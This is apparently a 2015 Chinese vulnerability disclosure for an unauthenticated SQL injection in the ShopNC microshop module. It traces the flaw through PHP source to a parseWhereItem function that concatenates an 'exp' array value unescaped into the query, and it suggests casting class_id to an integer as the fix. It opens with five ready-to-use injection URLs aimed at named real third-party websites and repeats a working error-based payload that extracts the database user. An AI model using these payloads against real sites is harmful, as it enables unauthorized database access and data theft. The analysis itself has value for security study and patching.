### 简要描述: 无需登录直接出数据 ### 详细说明: 为了节省审核时间,先来五个实例 ``` http://www.xiu365.cn/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://www.xiu365.cn/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://o.oular.com/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://121.42.141.67/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` ``` http://m.qthtbw.com/modules/microshop/index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` 看到 E:/wamp/www/shopnc B2B2C/modules/microshop/control/personal.php ``` public function listOp() { $model_class = Model('micro_personal_class'); $class_list = $model_class->getList(TRUE,NULL,'class_sort asc'); Tpl::output('class_list',$class_list); $condition = array(); if(isset($_GET['keyword'])) { $condition['commend_message'] = array('like','%'.$_GET['keyword'].'%'); } if(isset($_GET['class_id'])&&!empty($_GET['class_id'])) { $condition['class_id'] = $_GET['class_id']; } $order = 'microshop_sort asc,commend_time desc'; if($_GET['order'] == 'hot') { $order = 'microshop_sort asc,click_count desc'; } self::get_personal_list($condition,$order); Tpl::output('html_title',Language::get('nc_microshop_personal').'-'.Language::get('nc_microshop').'-'.C('site_name')); Tpl::showpage('personal_list'); } ``` 然后跟进get_personal_list ``` protected function get_personal_list( $condition, $order = "commend_time desc" ) { $model_personal = model( "micro_personal" ); $page_number = 35; $field = "micro_personal.*,member.member_name,member.member_avatar"; $list = $model_personal->getListWithUserInfo( $condition, $page_number, $order, $field ); Tpl::output( "show_page", $model_personal->showpage( 2 ) ); Tpl::output( "list", $list ); } ``` 
然后继续跟进getListWithUserInfo ``` public function getListWithUserInfo($condition,$page='',$order='',$field='*',$limit=''){ $on = 'micro_personal.commend_member_id = member.member_id'; $result = $this->table('micro_personal,member')->field($field)->join('left')->on($on)->where($condition)->page($page)->order($order)->limit($limit)->select(); return $result; } ``` 然后跟进可以看到这个函数parseWhereItem ``` protected function parseWhereItem( $key, $val ) { $whereStr = ""; if ( is_array( $val ) ) { if ( is_string( $val[0] ) ) { if ( preg_match( "/^(EQ|NEQ|GT|EGT|LT|ELT|NOTLIKE|LIKE)\$/i", $val[0] ) ) { $whereStr .= $key." ".$this->comparison[strtolower( $val[0] )]." ".$this->parseValue( $val[1] ); return $whereStr; } if ( "exp" == strtolower( $val[0] ) ) { $whereStr .= " (".$key." ".$val[1].") "; return $whereStr; } if ( preg_match( "/IN/i", $val[0] ) ) { if ( isset( $val[2] ) && "exp" == $val[2] ) { $whereStr .= $key." ".strtoupper( $val[0] )." ".$val[1]; return $whereStr; } if ( empty( $val[1] ) ) { $whereStr .= $key." ".strtoupper( $val[0] )."('')"; return $whereStr; } if ( is_string( $val[1] ) ) { $val[1] = explode( ",", $val[1] ); $zone = implode( ",", $this->parseValue( $val[1] ) ); $whereStr .= $key." ".strtoupper( $val[0] )." (".$zone.")"; return $whereStr; } if ( is_array( $val[1] ) ) { $zone = implode( ",", $this->parseValue( $val[1] ) ); $whereStr .= $key." ".strtoupper( $val[0] )." (".$zone.")"; return $whereStr; } } else if ( preg_match( "/BETWEEN/i", $val[0] ) ) { $data = is_string( $val[1] ) ? explode( ",", $val[1] ) : $val[1]; $whereStr .= " (".$key." ".strtoupper( $val[0] )." ".$this->parseValue( $data[0] )." AND ".$this->parseValue( $data[1] )." )"; return $whereStr; } else { $error = "Model Error: args ".$val[0]." 
is error!"; throw_exception( $error ); return $whereStr; } } else { $count = count( $val ); if ( in_array( strtoupper( trim( $val[$count - 1] ) ), array( "AND", "OR", "XOR" ) ) ) { $rule = strtoupper( trim( $val[$count - 1] ) ); $count -= 1; } else { $rule = "AND"; } $i = 0; for ( ;$i < $count;++$i) { $data = is_array( $val[$i] ) ? $val[$i][1] : $val[$i]; if ( "exp" == strtolower( $val[$i][0] ) ) { $whereStr .= "(".$key." ".$data.") ".$rule." "; } else { $op = is_array( $val[$i] ) ? $this->comparison[strtolower( $val[$i][0] )] : "="; $whereStr .= "(".$key." ".$op." ".$this->parseValue( $data ).") ".$rule." "; } } $whereStr = substr( $whereStr, 0, -4 ); return $whereStr; } } else { $whereStr .= $key." = ".$this->parseValue( $val ); } return $whereStr; } ``` 如果传入的 $val 是数组且 $val[0] 为 exp,parseWhereItem 会直接把 $val[1] 原样拼进 WHERE 子句,不经过 parseValue 转义,因此 $val[1] 可以写任意的 sql 语句。根据以上的信息我们可以看到 $condition['class_id'] 其实是 $_GET['class_id'] 直接传进去的,listOp 只做了 isset/!empty 判断而没有校验类型,所以我们可以传一个数组。修复时应在 listOp 中把 class_id 强制转为整数(例如 intval)再放入 $condition,而不是把 GET 数组原样交给 where()。然后构造以下 exp ``` index.php?act=personal&class_id[0]=exp&class_id[1]=1)%20or%20updatexml(1,concat(0x5c,user()),1)%23 ``` [<img src="https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png" alt="QQ截图20150702194117.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png" alt="QQ截图20150702194117.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/0219435956aa6f2966a4b1b027f363b285319690.png)